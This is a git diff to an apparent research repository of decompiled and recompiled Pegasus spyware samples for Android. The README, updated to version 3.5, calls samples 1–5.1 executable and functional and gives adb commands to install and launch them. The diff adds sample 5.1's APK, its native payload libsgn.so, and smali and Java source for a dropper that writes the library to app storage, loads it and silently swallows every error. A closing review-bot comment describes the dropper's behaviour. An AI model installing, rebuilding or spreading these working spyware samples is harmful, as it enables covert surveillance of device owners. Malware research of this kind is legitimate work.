diff --git a/.gitignore b/.gitignore index fb3b1c5..c9bd1d5 100644 --- a/.gitignore +++ b/.gitignore @@ -30,3 +30,4 @@ Temporary Items .idea/* **/LOGS +.DS_Store diff --git a/README.md b/README.md index 8eeb956..bef9320 100644 --- a/README.md +++ b/README.md @@ -1,9 +1,9 @@ # Pegasus Spyware Samples Decompiled & Recompiled ## Author: Jonathan Scott @jonathandata1 -### CURRENT VERSION 3.0 +### CURRENT VERSION 3.5 ## Description: -### Samples 1-5 are executable and functional. I am still working on cleaning up Sample #6, but most the XML data can be read. +### Samples 1-5.1 are executable and functional. I am still working on cleaning up Sample #6, but most the XML data can be read. ## Steps To Install & Research The Spyware Samples 
@@ -13,23 +13,31 @@ 4. launch the apk, example `adb shell am start com.xxGameAssistant.pao/.SplashActivity` +## Update: Sample 5.1 +### This sample can be installed as a standalone apk, but you will need to uninstall sample 5. +`adb uninstall com.network.android ` + +### Sample 5.1 is also called com.network.android + ## Samples Included -| Sample # | Hash | -|----------|------------------------------------------------------------------| -| Sample 1 | d257cfde7599f4e20ee08a62053e6b3b936c87d373e6805f0e0c65f1d39ec320 | -| Sample 2 | cc9517aafb58279091ac17533293edc1 | -| Sample 3 | bd8cda80aaee3e4a17e9967a1c062ac5c8e4aefd7eaa3362f54044c2c94db52a | -| Sample 4 | 144778790d4a43a1d93dff6b660a6acb3a6d37a19e6a6f0a6bf1ef47e919648e | -| Sample 5 | 7c3ad8fec33465fed6563bbfabb5b13d | -| Sample 6 | 530b4f4d139f3ef987d661b2a9f74f5f | +| Sample # | Hash | +|------------|------------------------------------------------------------------| +| Sample 1 | d257cfde7599f4e20ee08a62053e6b3b936c87d373e6805f0e0c65f1d39ec320 | +| Sample 2 | cc9517aafb58279091ac17533293edc1 | +| Sample 3 | bd8cda80aaee3e4a17e9967a1c062ac5c8e4aefd7eaa3362f54044c2c94db52a | +| Sample 4 | 144778790d4a43a1d93dff6b660a6acb3a6d37a19e6a6f0a6bf1ef47e919648e | +| Sample 5 | 7c3ad8fec33465fed6563bbfabb5b13d | +| Sample 5.1 | 3474625e63d0893fc8f83034e835472d95195254e1e4bdf99153b7c74eb44d86 | +| Sample 6 | 530b4f4d139f3ef987d661b2a9f74f5f | + ## Acknowledgements ### @vxunderground for providing the samples ### @recordedfuture for validation -![PEGASUS SPYWARE 5-6](https://i.postimg.cc/7PzxWxCt/pegasus-spyware-samples-5-6.jpg) +![PEGASUS SPYWARE 5.1](https://i.postimg.cc/tJ9QtqvQ/pegaus-sample-5-1.jpg) diff --git a/pegasus-spyware-decompiled/.DS_Store b/pegasus-spyware-decompiled/.DS_Store index 934596e..a15af40 100644 Binary files a/pegasus-spyware-decompiled/.DS_Store and b/pegasus-spyware-decompiled/.DS_Store differ 
diff --git a/pegasus-spyware-decompiled/sample1/apk/sample1.d.apk b/pegasus-spyware-decompiled/sample1/apk/sample1.d.apk new file mode 100644 index 0000000..ab721b2 Binary files /dev/null and b/pegasus-spyware-decompiled/sample1/apk/sample1.d.apk differ diff --git a/pegasus-spyware-decompiled/sample5.1/apk/sample5.1.apk b/pegasus-spyware-decompiled/sample5.1/apk/sample5.1.apk new file mode 100644 index 0000000..e3f9723 Binary files /dev/null and b/pegasus-spyware-decompiled/sample5.1/apk/sample5.1.apk differ diff --git a/pegasus-spyware-decompiled/sample5.1/decompiled_raw/AndroidManifest.xml b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/AndroidManifest.xml new file mode 100644 index 0000000..423af03 --- /dev/null +++ b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/AndroidManifest.xml @@ -0,0 +1,145 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/pegasus-spyware-decompiled/sample5.1/decompiled_raw/assets/libsgn.so b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/assets/libsgn.so new file mode 100644 index 0000000..a65bcb1 Binary files /dev/null and b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/assets/libsgn.so differ diff --git a/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/AndroidManifest.xml b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/AndroidManifest.xml new file mode 100644 index 0000000..ab07e27 Binary files /dev/null and b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/AndroidManifest.xml differ 
diff --git a/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/META-INF/CERT.RSA b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/META-INF/CERT.RSA
new file mode 100644
index 0000000..655ecb2
Binary files /dev/null and b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/META-INF/CERT.RSA differ
diff --git a/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/META-INF/CERT.SF b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/META-INF/CERT.SF
new file mode 100644
index 0000000..6e65cd2
--- /dev/null
+++ b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/META-INF/CERT.SF
@@ -0,0 +1,13 @@
+Signature-Version: 1.0
+Created-By: 1.0 (Android)
+SHA1-Digest-Manifest: QtP9Wf1dBHcD3j0V1qlmHWE9tCY=
+
+Name: assets/libsgn.so
+SHA1-Digest: EXziNPMuyBvFLQcTuvghn7cP9D4=
+
+Name: AndroidManifest.xml
+SHA1-Digest: u52ZD4iVi9JT9MOZcAal2TGqWwk=
+
+Name: classes.dex
+SHA1-Digest: XbIYdgwDDljsSeLdHQ6NfARfZmE=
+
diff --git a/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/META-INF/MANIFEST.MF b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/META-INF/MANIFEST.MF
new file mode 100644
index 0000000..55c5c26
--- /dev/null
+++ b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/original/META-INF/MANIFEST.MF
@@ -0,0 +1,12 @@
+Manifest-Version: 1.0
+Created-By: 1.0 (Android)
+
+Name: assets/libsgn.so
+SHA1-Digest: jlkXqWHZ2rv8dMXlxoilUIDgTJA=
+
+Name: AndroidManifest.xml
+SHA1-Digest: LzjAF3wad04BalUStEmhMVUXcqE=
+
+Name: classes.dex
+SHA1-Digest: l7Rkps9BGFD3U4NvGpnf3laUUPo=
+
diff --git a/pegasus-spyware-decompiled/sample5.1/decompiled_raw/smali/com/network/android/BuildConfig.smali b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/smali/com/network/android/BuildConfig.smali
new file mode 100644
index 0000000..19fdc43
--- /dev/null
+++ b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/smali/com/network/android/BuildConfig.smali
@@ -0,0 +1,19 @@
+.class public final Lcom/network/android/BuildConfig;
+.super Ljava/lang/Object;
+.source "BuildConfig.java"
+
+
+# static fields
+.field public static final DEBUG:Z
+
+
+# direct methods
+.method public constructor ()V
+ .locals 0
+
+ .prologue
+ .line 4
+ invoke-direct {p0}, Ljava/lang/Object;->()V
+
+ return-void
+.end method
diff --git a/pegasus-spyware-decompiled/sample5.1/decompiled_raw/smali/com/network/android/NetworkMain.smali b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/smali/com/network/android/NetworkMain.smali
new file mode 100644
index 0000000..2f0baf6
--- /dev/null
+++ b/pegasus-spyware-decompiled/sample5.1/decompiled_raw/smali/com/network/android/NetworkMain.smali
@@ -0,0 +1,121 @@ +.class public Lcom/network/android/NetworkMain; +.super Landroid/app/Activity; +.source "NetworkMain.java" + + +# direct methods +.method public constructor ()V + .locals 0 + + .prologue + .line 12 + invoke-direct {p0}, Landroid/app/Activity;->()V + + return-void +.end method + + +# virtual methods +.method protected onCreate(Landroid/os/Bundle;)V + .locals 7 + .param p1, "savedInstanceState" # Landroid/os/Bundle; + + .prologue + .line 17 + invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V + + .line 19 + const-string v2, "/data/data/com.network.android/libsgn.so" + + .line 22 + .local v2, "libPath":Ljava/lang/String; + :try_start_0 + invoke-virtual {p0}, Lcom/network/android/NetworkMain;->getResources()Landroid/content/res/Resources; + + move-result-object v5 + + invoke-virtual {v5}, Landroid/content/res/Resources;->getAssets()Landroid/content/res/AssetManager; + + move-result-object v5 + + const-string v6, "libsgn.so" + + invoke-virtual {v5, v6}, Landroid/content/res/AssetManager;->open(Ljava/lang/String;)Ljava/io/InputStream; + + move-result-object v1 + + .line 23 + .local v1, "iS":Ljava/io/InputStream; + invoke-virtual {v1}, Ljava/io/InputStream;->available()I + + move-result v5 + + new-array v0, v5, [B + + .line 24 + .local v0, "buffer":[B + invoke-virtual {v1, v0}, Ljava/io/InputStream;->read([B)I + + .line 25 + new-instance v3, Ljava/io/ByteArrayOutputStream; + + invoke-direct {v3}, Ljava/io/ByteArrayOutputStream;->()V + + .line 27 + .local v3, "oS":Ljava/io/ByteArrayOutputStream; + invoke-virtual {v3, v0}, Ljava/io/ByteArrayOutputStream;->write([B)V + + .line 29 + invoke-virtual {v3}, Ljava/io/ByteArrayOutputStream;->close()V + + .line 30 + invoke-virtual {v1}, Ljava/io/InputStream;->close()V + + .line 32 + new-instance v4, Ljava/io/FileOutputStream; + + invoke-direct {v4, v2}, Ljava/io/FileOutputStream;->(Ljava/lang/String;)V + + .line 33 + .local v4, "outputStream":Ljava/io/OutputStream; + invoke-virtual {v3, 
v4}, Ljava/io/ByteArrayOutputStream;->writeTo(Ljava/io/OutputStream;)V + + .line 34 + invoke-virtual {v4}, Ljava/io/OutputStream;->close()V + + .line 36 + invoke-static {v2}, Ljava/lang/System;->load(Ljava/lang/String;)V + :try_end_0 + .catch Ljava/io/IOException; {:try_start_0 .. :try_end_0} :catch_2 + .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_1 + .catch Ljava/lang/Throwable; {:try_start_0 .. :try_end_0} :catch_0 + + .line 48 + .end local v0 # "buffer":[B + .end local v1 # "iS":Ljava/io/InputStream; + .end local v3 # "oS":Ljava/io/ByteArrayOutputStream; + .end local v4 # "outputStream":Ljava/io/OutputStream; + :goto_0 + invoke-virtual {p0}, Lcom/network/android/NetworkMain;->finish()V + + .line 49 + return-void + + .line 45 + :catch_0 + move-exception v5 + + goto :goto_0 + + .line 42 + :catch_1 + move-exception v5 + + goto :goto_0 + + .line 39 + :catch_2 + move-exception v5 + + goto :goto_0 +.end method diff --git a/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/AndroidManifest.xml b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/AndroidManifest.xml new file mode 100644 index 0000000..83bd9fc --- /dev/null +++ b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/AndroidManifest.xml @@ -0,0 +1,145 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/META-INF/CERT.RSA b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/META-INF/CERT.RSA new file mode 100644 index 0000000..655ecb2 Binary files /dev/null and b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/META-INF/CERT.RSA differ 
diff --git a/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/META-INF/CERT.SF b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/META-INF/CERT.SF
new file mode 100644
index 0000000..6e65cd2
--- /dev/null
+++ b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/META-INF/CERT.SF
@@ -0,0 +1,13 @@
+Signature-Version: 1.0
+Created-By: 1.0 (Android)
+SHA1-Digest-Manifest: QtP9Wf1dBHcD3j0V1qlmHWE9tCY=
+
+Name: assets/libsgn.so
+SHA1-Digest: EXziNPMuyBvFLQcTuvghn7cP9D4=
+
+Name: AndroidManifest.xml
+SHA1-Digest: u52ZD4iVi9JT9MOZcAal2TGqWwk=
+
+Name: classes.dex
+SHA1-Digest: XbIYdgwDDljsSeLdHQ6NfARfZmE=
+
diff --git a/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/META-INF/MANIFEST.MF b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/META-INF/MANIFEST.MF
new file mode 100644
index 0000000..55c5c26
--- /dev/null
+++ b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/META-INF/MANIFEST.MF
@@ -0,0 +1,12 @@
+Manifest-Version: 1.0
+Created-By: 1.0 (Android)
+
+Name: assets/libsgn.so
+SHA1-Digest: jlkXqWHZ2rv8dMXlxoilUIDgTJA=
+
+Name: AndroidManifest.xml
+SHA1-Digest: LzjAF3wad04BalUStEmhMVUXcqE=
+
+Name: classes.dex
+SHA1-Digest: l7Rkps9BGFD3U4NvGpnf3laUUPo=
+
diff --git a/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/assets/libsgn.so b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/assets/libsgn.so
new file mode 100644
index 0000000..a65bcb1
Binary files /dev/null and b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/assets/libsgn.so differ
diff --git a/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/classes.dex b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/classes.dex
new file mode 100644
index 0000000..1f8a97d
Binary files /dev/null and b/pegasus-spyware-decompiled/sample5.1/recompiled_java/resources/classes.dex differ
diff --git a/pegasus-spyware-decompiled/sample5.1/recompiled_java/sources/com/network/android/BuildConfig.java b/pegasus-spyware-decompiled/sample5.1/recompiled_java/sources/com/network/android/BuildConfig.java
new file mode 100644
index 0000000..4d73b93
--- /dev/null
+++ b/pegasus-spyware-decompiled/sample5.1/recompiled_java/sources/com/network/android/BuildConfig.java
@@ -0,0 +1,5 @@
+package com.network.android;
+/* loaded from: classes.dex */
+public final class BuildConfig {
+ public static final boolean DEBUG = false;
+}
diff --git a/pegasus-spyware-decompiled/sample5.1/recompiled_java/sources/com/network/android/NetworkMain.java b/pegasus-spyware-decompiled/sample5.1/recompiled_java/sources/com/network/android/NetworkMain.java
new file mode 100644
index 0000000..83f0932
--- /dev/null
+++ b/pegasus-spyware-decompiled/sample5.1/recompiled_java/sources/com/network/android/NetworkMain.java
@@ -0,0 +1,33 @@
+package com.network.android;
+
+import android.app.Activity;
+import android.os.Bundle;
+import java.io.ByteArrayOutputStream;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+/* loaded from: classes.dex */
+public class NetworkMain extends Activity {
+ @Override // android.app.Activity
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ try {
+ InputStream iS = getResources().getAssets().open("libsgn.so");
+ byte[] buffer = new byte[iS.available()];
+ iS.read(buffer);
+ ByteArrayOutputStream oS = new ByteArrayOutputStream();
+ oS.write(buffer);
+ oS.close();
+ iS.close();
+ OutputStream outputStream = new FileOutputStream("/data/data/com.network.android/libsgn.so");
+ oS.writeTo(outputStream);
+ outputStream.close();
+ System.load("/data/data/com.network.android/libsgn.so");
+ } catch (IOException e) {
+ } catch (Exception e2) {
+ } catch (Throwable th) {
+ }
+ finish();
+ }
+}
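Review bot: NetworkMain.java carries no analyst-facing documentation, so a reader of the recompiled source has to reconstruct what the activity does from the body of onCreate; a header comment above the class would help. What the hunk shows is that onCreate opens the bundled asset `libsgn.so`, writes it to `/data/data/com.network.android/libsgn.so`, calls `System.load` on that path, swallows `IOException`, `Exception` and `Throwable` in three empty catch blocks, and then calls `finish()` unconditionally, so the activity exits silently whether or not the native library was loaded. Suggested comment: `/* Analyst note: decompiler output, kept as-is. onCreate drops asset libsgn.so to /data/data/com.network.android/libsgn.so, System.load()s it, swallows every exception and always finish()es; the dropped file at that path is the observable on-device artifact. */`. The `available()`-then-single-`read()` pattern also does not guarantee the whole asset is copied, which matters when comparing a dropped file's digest against the bundled asset's; that is the sample's own behaviour and should be documented rather than changed.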